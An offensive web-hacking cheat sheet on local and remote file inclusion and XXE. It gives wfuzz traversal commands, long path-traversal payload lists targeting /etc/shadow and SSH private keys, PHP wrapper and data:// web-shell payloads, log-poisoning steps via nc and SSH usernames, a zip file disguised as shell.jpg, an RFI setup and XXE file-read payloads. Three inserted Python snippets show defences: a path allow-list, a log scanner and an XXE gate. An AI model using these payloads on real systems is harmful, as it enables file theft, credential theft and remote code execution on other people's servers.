LFI / XXE

01. Local File Inclusion (LFI)

01.1 Linux

## ------------------| Linux
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hl 367
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hl 367

wget https://raw.githubusercontent.com/foospidy/payloads/master/other/traversal/dotdotpwn.txt
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w dotdotpwn.txt --hl 367

## ------------------| Windows
wfuzz -u http://<URL>/index.php?page=../../../..FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt --hl 367
  • Useful LFI files

../../../etc/passwd
../../../../../../../../../../../../etc/passwd

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.bash_history
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/proc/self/environ
/proc/self/cmdline
../index.php
../../index.php
%2e%2e%2findex.php
%252e%252e%252findex.php
../../../../etc/passwd
/var/www/../../etc/passwd
../../../../../etc/passwd%00
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
....//....//etc/passwd
%252e%252e%252fetc%252fpasswd
%252e%252e%252fetc%252fpasswd%00
..///////..////..//////etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
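The defensive counterpart to the list above, added here as an example (not part of the original sheet): a Python allow-list resolver that decodes the `page` value the way the application eventually would and names the trick it rejected, so the payloads above show up as distinct reasons in the application log. `BASE_DIR`, the `.php`-only allow-list and the reason strings are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote_to_bytes

# Assumed location of the includable pages (constructed for this example).
BASE_DIR = "/var/www/html/pages"
# Positive allow-list: the only file names the application will ever include.
ALLOWED = re.compile(rb"^[A-Za-z0-9_-]+\.php$")
# Overlong UTF-8 lead bytes (e.g. %c0%af used as an alternative '/') are never valid.
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]|\xe0[\x80-\x9f]|\xf0[\x80-\x8f]")

def decode_fully(value, max_rounds=3):
    """Percent-decode until the value stops changing, so %252e%252e%252f
    (double encoding) is seen as '../' instead of slipping past one decode."""
    raw = value.encode("utf-8") if isinstance(value, str) else value
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw

def classify_page(value):
    """Return (reason, path). reason == "ok" means path is safe to include;
    any other reason names the trick that was rejected, suitable for logging."""
    raw = decode_fully(value)
    if b"\x00" in raw:                                   # /etc/passwd%00 truncation
        return "null-byte", None
    if OVERLONG.search(raw):                             # ..%c0%af..%c0%af style
        return "overlong-utf8", None
    if b"://" in raw or re.match(rb"^[a-z][a-z0-9+.-]*:", raw, re.I):
        return "scheme", None                            # php://, data:, zip://, expect://
    raw = raw.replace(b"\\", b"/")                       # %5c and \ are separators too
    if raw.startswith(b"/") or any(b".." in seg for seg in raw.split(b"/")):
        return "traversal", None                         # absolute paths, ../, ....//
    if not ALLOWED.match(raw):
        return "not-allowlisted", None
    path = posixpath.normpath(posixpath.join(BASE_DIR, raw.decode("ascii")))
    if not path.startswith(BASE_DIR + "/"):              # belt and braces after normpath
        return "traversal", None
    return "ok", path
```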
  • Configuration Files

## ------------------| Apache
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-available/000-default.conf
/etc/httpd/conf/httpd.conf
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log

## ------------------| nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
/etc/nginx/sites-available/default
/etc/nginx/nginx.conf
/etc/nginx/proxy_params

## ------------------| MySql
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI

## ------------------| Tomcat
/usr/share/tomcat9/bin/catalina.sh
/usr/share/tomcat9/etc/tomcat-users.xml
/var/lib/tomcat9/conf/tomcat-users.xml
/var/lib/tomcat9/conf/server.xml
/var/lib/tomcat9/conf/web.xml
/var/lib/tomcat9/conf/

## ------------------| Spring Boot 
application.properties
application.yml
config/application.properties
config/application.yml

## ------------------| Webroot locations
/var/www/html/            # Apache
/usr/local/nginx/html/    # Nginx
c:\inetpub\wwwroot\       # IIS
C:\xampp\htdocs\          # XAMPP
C:\wamp\www\              # WAMP
  • Log Files

## ------------------| Generic
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache2/error.log

## ------------------| Red Hat/CentOS/Fedora Linux
/var/log/httpd/access_log

## ------------------| Debian/Ubuntu
/var/log/apache2/access.log

## ------------------| FreeBSD
/var/log/httpd-access.log

## ------------------| XAMPP
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log
  • Download the binary of a running process

## ------------------| Identify running tasks and note the PID
/proc/sched_debug

## ------------------| Get the path of that process's binary, then download it
/proc/<PID>/cmdline

## ------------------| Get the linked libraries
/proc/<PID>/maps

01.2 Windows

  • File Paths

/Windows/win.ini
/windows/system32/license.rtf
/Windows/debug/NetSetup.log
/Users/Administrator/NTUser.dat
/Documents and Settings/Administrator/NTUser.dat
/apache/logs/access.log
/apache/logs/error.log
/apache/php/php.ini
/boot.ini
/inetpub/wwwroot/global.asa
/MySQL/data/hostname.err
/MySQL/data/mysql.err
/MySQL/data/mysql.log
/MySQL/my.cnf
/MySQL/my.ini
/php4/php.ini
/php5/php.ini
/php/php.ini
/Program Files/Apache Group/Apache2/conf/httpd.conf
/Program Files/Apache Group/Apache/conf/httpd.conf
/Program Files/Apache Group/Apache/logs/access.log
/Program Files/Apache Group/Apache/logs/error.log
/Program Files/FileZilla Server/FileZilla Server.xml
/Program Files/MySQL/data/hostname.err
/Program Files/MySQL/data/mysql-bin.log
/Program Files/MySQL/data/mysql.err
/Program Files/MySQL/data/mysql.log
/Program Files/MySQL/my.ini
/Program Files/MySQL/my.cnf
/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
/Program Files/MySQL/MySQL Server 5.0/my.cnf
/Program Files/MySQL/MySQL Server 5.0/my.ini
/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
/Program Files (x86)/Apache Group/Apache/conf/access.log
/Program Files (x86)/Apache Group/Apache/conf/error.log
/Program Files (x86)/FileZilla Server/FileZilla Server.xml
/Program Files (x86)/xampp/apache/conf/httpd.conf
/WINDOWS/php.ini
/WINDOWS/Repair/SAM
/Windows/repair/system
/Windows/repair/software
/Windows/repair/security
/WINDOWS/System32/drivers/etc/hosts
/WINNT/php.ini
/WINNT/win.ini
/xampp/password
/xampp/tomcat/conf/tomcat-users.xml
/xampp/htdocs/index.php
/xampp/apache/conf/httpd.conf
/xampp/apache/bin/php.ini
/xampp/phpMyAdmin/config.inc.php
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log
/Windows/Panther/Unattend/Unattended.xml
/Windows/Panther/Unattended.xml
/Windows/system32/config/AppEvent.Evt
/Windows/system32/config/SecEvent.Evt
/Windows/system32/config/default.sav
/Windows/system32/config/security.sav
/Windows/system32/config/software.sav
/Windows/system32/config/system.sav
/Windows/system32/config/regback/default
/Windows/system32/config/regback/sam
/Windows/system32/config/regback/security
/Windows/system32/config/regback/system
/Windows/system32/config/regback/software
/Program Files/MySQL/MySQL Server 5.1/my.ini
/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
/Windows/System32/inetsrv/config/applicationHost.config
/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log

01.3 Wrappers & Filters

## ------------------| Basic
?page=data:text/plain,h4rithd
?page=data:text/plain,<?php system($_GET['cmd']); ?>
?page=data:text/plain,<?php echo shell_exec("whoami"); ?>

## ------------------| Base64 and rot13
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://FilTer/convert.base64-encode/resource=index.php

## ------------------| zlib
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
## To read the result, base64-decode it into test.deflated, then:
# php -a   # starts an interactive PHP console
# readfile('php://filter/zlib.inflate/resource=test.deflated');

## ------------------| zip://
# echo "<pre><?php system(\$_GET['cmd']); ?></pre>" > payload.php;   # escape $_GET or the shell expands it to nothing
# zip payload.zip payload.php;
# mv payload.zip shell.jpg;
# rm payload.php
?page=zip://shell.jpg%23payload.php

## ------------------| data://
?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
?page=data://text/plain,<?php phpinfo(); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
# NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

## ------------------| expect://
?page=expect://id
?page=expect://ls

## ------------------| php://input
?page=php://input
# POST DATA: <?php system('id'); ?>

01.4 LFI to RCEs

# Vulnerable sink: the included path comes straight from the request
include($file);

  • Log Poisoning

## ------------------| Basic Payload
<?php phpinfo(); ?>
<?php system($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>'; ?>

## ------------------| Send to Apache over a raw connection
nc <IP> 80
...enter..payload..here!...

## Session files, auth cookies and any other session data are stored in:
## ------------------| Linux
/tmp/sess_<session_id>
/var/tmp/sess_<session_id>
/var/lib/php/sessions/sess_<session_id>
/proc/self/environ ## <-- use the User-Agent header: <?=phpinfo(); ?>
/var/log/auth.log ## <-- use ssh '<?php system($_REQUEST['cmd']); ?>'@IP
/var/log/vsftpd.log ## <-- use the above payload as the FTP username
/var/log/apache2/access.log ## <-- send it from nc (BEST WAY!!) or request http://IP/<?php phpinfo(); ?>

## ------------------| Windows
\Windows\TEMP\sess_<session_id>
c:\xampp\apache\logs\access.log&cmd=ipconfig
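Added example (not from the original sheet) for the blue-team side of this section: the same access.log that gets poisoned is where the attempts are visible, so this Python scanner runs the traversal, wrapper and poisoning indicators from this page over a few constructed combined-format lines. The sample lines, rule names and field layout are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed Apache "combined" log lines (not from any real host) mixing benign
# traffic with the LFI, wrapper and log-poisoning requests listed above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 2150 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 6602 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2150 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_REQUEST['cmd']); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?page=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 99801 "-" "Mozilla/5.0"
"""

# client, timestamp, request line, status, bytes, referer, user-agent
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$')

RULES = [
    ("traversal",   re.compile(r"\.\.[\\/]|\.\.%c0%af|/etc/(?:passwd|shadow)|/proc/self/", re.I)),
    ("wrapper",     re.compile(r"\b(?:php|zip|expect|phar|data):", re.I)),
    ("php-tag",     re.compile(r"<\?(?:php|=)", re.I)),            # poisoning attempt
    ("log-include", re.compile(r"/var/log/|[\\/]logs[\\/]|\bsess_", re.I)),
    ("cmd-param",   re.compile(r"[?&]cmd=", re.I)),
]

def decode_fully(text, max_rounds=3):
    """Percent-decode until stable so double-encoded payloads become visible."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_log(text):
    """Return [(line_no, client_ip, [tags])] for every line matching a rule.
    Request line, referer and user-agent are all inspected, because each of
    them is written to access.log and can carry a poisoning payload."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        fields = " ".join((m.group(3), m.group(6), m.group(7)))
        haystack = fields + " " + decode_fully(fields)   # match raw and decoded forms
        tags = [name for name, rx in RULES if rx.search(haystack)]
        if tags:
            hits.append((line_no, m.group(1), tags))
    return hits
```

Lines whose user-agent contains a literal double quote will not match `LOG_RE` and are skipped; a production scanner should fall back to a lenient parse for those rather than drop them.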

01.5 Tricks

  • phpinfo() (file_uploads = on)

# Download this script
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/File%20Inclusion/phpinfolfi.py

01.6 LFI with python

02. Remote File Inclusion

## Requires allow_url_include = On in php.ini
allow_url_include

nc -lvnp 80

## ------------------| Create payload file (php/txt)
<?php phpinfo(); ?>
<?php system($_REQUEST['cmd']); ?>
<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>'; ?>

## ------------------| Execute
### move the file to /var/www/html and start the Apache server
### execute
?page=http://<IP>/file.txt

03. XML external entity (XXE) injection

  • Common payloads

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
    <productId>
        &xxe;
    </productId>
</stockCheck>
  • Filters

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php"> ]>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/hosts.php"> ]>
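Added example (not from the original sheet): a Python pre-parse gate that rejects any stockCheck document carrying a DOCTYPE or an external entity declaration, including the php://filter form above and a UTF-16 re-encoding of the same payload, before handing clean documents to ElementTree. The document shape, the numeric productId rule and the reason strings are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed stock-check request in the payload shape shown above (not a captured message).
MALICIOUS = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>"""

BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>"""

DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.I)
# Covers general and parameter (%) entities pointing at SYSTEM or PUBLIC identifiers.
ENTITY_RE = re.compile(rb"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)", re.I)

def to_utf8(data):
    """Normalise BOM-marked UTF-16 input so the byte scan cannot be dodged by re-encoding."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16").encode("utf-8")
    return data

def parse_stock_check(data):
    """Reject any document that carries a DTD, then parse. Returns (status, productId)."""
    data = to_utf8(data)
    if ENTITY_RE.search(data):
        return "rejected: external entity declaration", None
    if DOCTYPE_RE.search(data):
        return "rejected: DOCTYPE not allowed", None
    root = ET.fromstring(data)
    if root.tag != "stockCheck":
        return "rejected: unexpected root", None
    node = root.find("productId")
    if node is None or not (node.text or "").strip().isdigit():
        return "rejected: productId must be numeric", None
    return "ok", int(node.text.strip())
```

In PHP the parser-side control is to parse with LIBXML_NONET and never with LIBXML_NOENT; this gate is a second layer in front of whatever parser the application uses.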